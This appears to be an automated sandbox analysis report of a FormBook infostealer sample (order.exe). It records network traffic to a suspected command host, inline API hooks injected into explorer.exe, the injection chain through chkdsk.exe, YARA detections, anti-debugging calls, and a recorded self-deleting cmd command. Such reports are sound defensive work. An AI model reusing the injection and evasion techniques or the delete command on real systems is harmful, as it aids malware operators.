                                Nov 19, 2020 16:10:30.856365919 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856396914 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856414080 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856430054 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856434107 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856447935 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856468916 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856499910 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856519938 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856554031 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856581926 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856615067 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856654882 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856688023 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856692076 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856709003 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856725931 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856749058 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856756926 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856787920 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856806993 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856817961 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856842041 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856848001 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856873989 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856878996 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856908083 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856909990 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856920004 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.856947899 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.856981039 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857007980 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857012033 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857038975 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857042074 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857070923 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857073069 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857086897 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857103109 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857122898 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857135057 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857152939 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857166052 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857203007 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857223034 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857235909 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857259989 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857266903 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857292891 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857297897 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857311010 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857328892 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857355118 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857357979 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857388020 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857389927 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857402086 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857419014 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857436895 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857455969 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857489109 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857508898 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857518911 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857542992 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857549906 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857574940 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857580900 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857597113 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857611895 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857644081 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857667923 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857685089 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857700109 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857723951 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857758999 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857783079 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857784986 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:30.857817888 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:30.857856035 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:35.720896959 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:35.720920086 CET44349735192.185.152.65192.168.2.7
                                Nov 19, 2020 16:10:35.721012115 CET49735443192.168.2.7192.185.152.65
                                Nov 19, 2020 16:10:55.479120970 CET49735443192.168.2.7192.185.152.65

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 19, 2020 16:09:27.216279030 CET6456953192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:27.243526936 CET53645698.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:28.402092934 CET5281653192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:28.429184914 CET53528168.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:29.210594893 CET5078153192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:29.237651110 CET53507818.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:30.185095072 CET5423053192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:30.212181091 CET53542308.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:30.999819994 CET5491153192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:31.026719093 CET53549118.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:33.333143950 CET4995853192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:33.360455036 CET53499588.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:34.001728058 CET5086053192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:34.028850079 CET53508608.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:34.699845076 CET5045253192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:34.726861954 CET53504528.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:35.857800961 CET5973053192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:35.884846926 CET53597308.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:36.667138100 CET5931053192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:36.694262981 CET53593108.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:37.469588041 CET5191953192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:37.496702909 CET53519198.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:38.819951057 CET6429653192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:38.847021103 CET53642968.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:39.778434992 CET5668053192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:39.805607080 CET53566808.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:40.843888998 CET5882053192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:40.870883942 CET53588208.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:41.153567076 CET6098353192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:41.190642118 CET53609838.8.8.8192.168.2.7
                                Nov 19, 2020 16:09:54.688739061 CET4924753192.168.2.78.8.8.8
                                Nov 19, 2020 16:09:54.715738058 CET53492478.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:12.328078985 CET5228653192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:12.365240097 CET53522868.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:12.419054031 CET5606453192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:12.447438955 CET53560648.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:13.494297981 CET6374453192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:13.529934883 CET53637448.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:29.528084040 CET6145753192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:29.688904047 CET53614578.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:30.412384987 CET5836753192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:30.448786020 CET53583678.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:31.190339088 CET6059953192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:31.225877047 CET53605998.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:31.666188002 CET5957153192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:31.702122927 CET53595718.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:31.998749971 CET5268953192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:32.034329891 CET53526898.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:32.363002062 CET5029053192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:32.398730993 CET53502908.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:32.803275108 CET6042753192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:32.838673115 CET53604278.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:33.277318954 CET5620953192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:33.312941074 CET53562098.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:33.842154026 CET5958253192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:33.886010885 CET53595828.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:34.141244888 CET6094953192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:34.177592993 CET53609498.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:35.192492962 CET5854253192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:35.228383064 CET53585428.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:35.603569984 CET5917953192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:35.607846022 CET6092753192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:35.641298056 CET53591798.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:35.643095970 CET53609278.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:55.682343006 CET5785453192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:55.717895031 CET53578548.8.8.8192.168.2.7
                                Nov 19, 2020 16:10:58.994088888 CET6202653192.168.2.78.8.8.8
                                Nov 19, 2020 16:10:59.021248102 CET53620268.8.8.8192.168.2.7
                                Nov 19, 2020 16:11:15.196707964 CET5945353192.168.2.78.8.8.8
                                Nov 19, 2020 16:11:15.223814011 CET53594538.8.8.8192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 19, 2020 16:10:29.528084040 CET192.168.2.78.8.8.80x81deStandard query (0)pilatescollective.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 19, 2020 16:10:29.688904047 CET8.8.8.8192.168.2.70x81deNo error (0)pilatescollective.com192.185.152.65A (IP address)IN (0x0001)

                                HTTPS Packets

                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                Nov 19, 2020 16:10:30.065084934 CET192.185.152.65443192.168.2.749735CN=www.pilatescollective.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 06 01:22:43 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 04 01:22:43 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                Code Manipulations

                                User Modules

                                Hook Summary

                                Function NameHook TypeActive in Processes
                                PeekMessageAINLINEexplorer.exe
                                PeekMessageWINLINEexplorer.exe
                                GetMessageWINLINEexplorer.exe
                                GetMessageAINLINEexplorer.exe

                                Processes

                                Process: explorer.exe, Module: user32.dll
                                Function NameHook TypeNew Data
                                PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xED
                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xED
                                GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xED
                                GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xED

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: order.exe PID: 6752 Parent PID: 5756

                                General

                                Start time:16:09:28
                                Start date:19/11/2020
                                Path:C:\Users\user\Desktop\order.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\order.exe'
                                Imagebase:0x400000
                                File size:86016 bytes
                                MD5 hash:27D7951EC430F93458370A00272D823D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Reputation:low

                                Chronological Activities

                                Analysis Process: order.exe PID: 6008 Parent PID: 6752

                                General

                                Start time:16:10:18
                                Start date:19/11/2020
                                Path:C:\Users\user\Desktop\order.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\order.exe'
                                Imagebase:0x400000
                                File size:86016 bytes
                                MD5 hash:27D7951EC430F93458370A00272D823D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Chronological Activities

                                Analysis Process: explorer.exe PID: 3292 Parent PID: 6008

                                General

                                Start time:16:10:32
                                Start date:19/11/2020
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:
                                Imagebase:0x7ff662bf0000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: chkdsk.exe PID: 4888 Parent PID: 3292

                                General

                                Start time:16:10:47
                                Start date:19/11/2020
                                Path:C:\Windows\SysWOW64\chkdsk.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                Imagebase:0xa20000
                                File size:23040 bytes
                                MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000002.506407898.0000000004C35000.00000004.00000020.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000013.00000002.508528778.00000000055FF000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 5336 Parent PID: 4888

                                General

                                Start time:16:10:52
                                Start date:19/11/2020
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del 'C:\Users\user\Desktop\order.exe'
                                Imagebase:0x870000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 5452 Parent PID: 5336

                                General

                                Start time:16:10:52
                                Start date:19/11/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff774ee0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: order.exe PID: 6752 Parent PID: 5756 order.exeCOMMON

                                  Executed Functions

                                  Function 022885C3, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 338nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02288E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,022887BE,00000040,02280914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02288E5E
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI$1.!T$]|$]|
                                  • API String ID: 675431017-3585929087
                                  • Opcode ID: 117f9f1d25102fa55749fdf4488edd361add0aeaa4063e5d129c912af1dd0413
                                  • Instruction ID: 6fde4d614ddc1fb3f43ff0392675aa3aa09a9dc4b6ff0b6f2d5a7e5dcc5fc812
                                  • Opcode Fuzzy Hash: 117f9f1d25102fa55749fdf4488edd361add0aeaa4063e5d129c912af1dd0413
                                  • Instruction Fuzzy Hash: 3EB17C746263468FEB20BFA488907A677D29F56350F94826ADC968B2DAD374C446CB03
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02280769, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 177nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumWindows.USER32(02280811,?,00000000,000000D3,?,000021D9,000021D9,00000000,00000004,00000000,00000000,000025D9,000029D9), ref: 022807AB
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 1954852945-4219829001
                                  • Opcode ID: cd0cfaa882505c30a0edf2e45e02e83998e2d629a581a0146bdf4548b84cb0ce
                                  • Instruction ID: fc84a792276fe7a50253c52a10806cf943e4ea5573a2f450aff49c86041bd9ee
                                  • Opcode Fuzzy Hash: cd0cfaa882505c30a0edf2e45e02e83998e2d629a581a0146bdf4548b84cb0ce
                                  • Instruction Fuzzy Hash: 9A41D074632306AFFF20BEE05C917FA37564F557A0FB08615DC4A5B1C8D2A5C89ECA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02285243, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 573COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 0={,$7n$o$7n$o
                                  • API String ID: 0-3751847529
                                  • Opcode ID: 832635eb0e3f1987c7c29d23d4c7d03613432e8f0f46542af18257ba12cb2b40
                                  • Instruction ID: 192fe2c5ece9d1a00daf0cdaf41f84914ea71495b8e784e70b76865399f13e0b
                                  • Opcode Fuzzy Hash: 832635eb0e3f1987c7c29d23d4c7d03613432e8f0f46542af18257ba12cb2b40
                                  • Instruction Fuzzy Hash: EB025B746223079BEB21BEA4C9907FA7663BF55350F608129FD4A972C8D7B4C886CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287BC8, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: c851cc75cefdd33787d9b66c360c926215e05712886f1d90e30a833e8c6e1d00
                                  • Instruction ID: 4e27afaf4c168b7a417e4381a992a0aaed626315cf666284be11341df4812748
                                  • Opcode Fuzzy Hash: c851cc75cefdd33787d9b66c360c926215e05712886f1d90e30a833e8c6e1d00
                                  • Instruction Fuzzy Hash: B581AC60A153878BEF107DA018817E93B515B57390F7A87A6CC4D0BDC9E268C82FDAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287738, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: 46a86c684ea25ba2e53b99f1520f2fb95ad252b54968dc0de419bf54caba28fb
                                  • Instruction ID: 06fdd5b6e4b4e0a7a4d0e163ca88bc871cbff410b0c3d94b4cc3bfd06854c685
                                  • Opcode Fuzzy Hash: 46a86c684ea25ba2e53b99f1520f2fb95ad252b54968dc0de419bf54caba28fb
                                  • Instruction Fuzzy Hash: 335101747223039FEB10BEE488907FA77924F55790FB08229DC468B1C9D3A4C84BCA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02280873, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 156nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: b2d4976bbdf53205fde42ea47dacbadb6ea50dfc4b451fdd7dc5adc9d02703c3
                                  • Instruction ID: bb29acbe7b1275c13d36fb447b50442dd5650e4dbe3094f66caf6418c01469fc
                                  • Opcode Fuzzy Hash: b2d4976bbdf53205fde42ea47dacbadb6ea50dfc4b451fdd7dc5adc9d02703c3
                                  • Instruction Fuzzy Hash: D141E3B0A153475BFF10BD901C817EA37554B067A0FB58766DC091B9C9E259C86FC6C3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022808C3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: c064e530671b9e78b6a9bdde3e336a8522ef1af433b1754a77815ad146f8705d
                                  • Instruction ID: f42d005ecc023e0607ec5daf3903e8e485dc542faca8e9e02b011040636e765d
                                  • Opcode Fuzzy Hash: c064e530671b9e78b6a9bdde3e336a8522ef1af433b1754a77815ad146f8705d
                                  • Instruction Fuzzy Hash: CE31BBA0A1134797FF10BDA018817EB27564B467A0F758722DC0D179C8E2A9CD6FCAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02280856, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
